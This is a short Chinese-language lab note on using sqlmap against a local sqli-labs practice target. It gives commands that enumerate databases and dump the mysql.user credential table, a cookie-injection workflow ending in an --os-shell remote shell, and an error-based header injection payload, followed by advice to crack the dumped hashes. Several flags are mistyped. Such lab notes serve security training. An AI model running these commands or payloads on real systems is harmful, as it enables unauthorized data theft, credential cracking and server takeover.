Sqlmap自动化测试
实验网址http://192.168.19.130/sqli-labs/Less-8/?id=1
Sqlmap:自动化测试sql注入工具
sqlmap -u ‘url’
–dbs 查询库名
-D 指定库
–table 查询表
-T 指定表
–column 查询字段
-C 指定字段
–dumps 读取数据
sqlmap: --batch自动全部选择yes level扫描等级
3.sqlmap -r “/root/桌面/sql-20.txt” --batch --cookie=“uname=admin” --level 3
cookie注入提权:
1.先用burp抓包有cookie注入
2。保存为文件
3.sqlmap -r “/root/桌面/sql-20.txt” --cookie=“id=1” --level 3
4.sqlmap -r “/root/桌面/sql-20.txt” --cookie=“id=1” --level 3 --os-shell
less-18-ua头注入
payload:
'and extractvalue(1,concat(0x7e,(select database()),0x7e)) and ’
先写出所有指令,具体步骤紧跟后面附图
1.sqlmap -u “http://192.168.19.130/sqli-labs/Less-8/?id=1”
2.sqlmap -u “http://192.168.19.130/sqli-labs/Less-8/?id=1”—dbs
3.sqlmap -u “http://192.168.19.130/sqli-labs/Less-8/?id=1”-D information_schema --column
4.
1sqlmap -u “http://192.168.19.130/sqli-labs/Less-8/?id=1”
//测出布尔型盲注和时间型盲注
2 sqlmap -u “http://192.168.19.130/sqli-labs/Less-8/?id=1”—dbs //列出所有数据库
3 sqlmap -u “http://192.168.19.130/sqli-labs/Less-8/?id=1”-D mysql –-tables//查询mysql中表
4 sqlmap -u “http://192.168.19.130/sqli-labs/Less-8/?id=1”-D mysql –T user –-columns//查询user表中的字段
sqlmap -u “http://192.168.19.130/sqli-labs/Less-8/?id=1”-D mysql –T user –C user –-dump//查询user字段中的数据
sqlmap -u “http://192.168.19.130/sqli-labs/Less-8/?id=1”-D mysql –T user –C password –-dump//查询password字段中的数据
表中password数据就出来了 当然这是加密的百度解密就行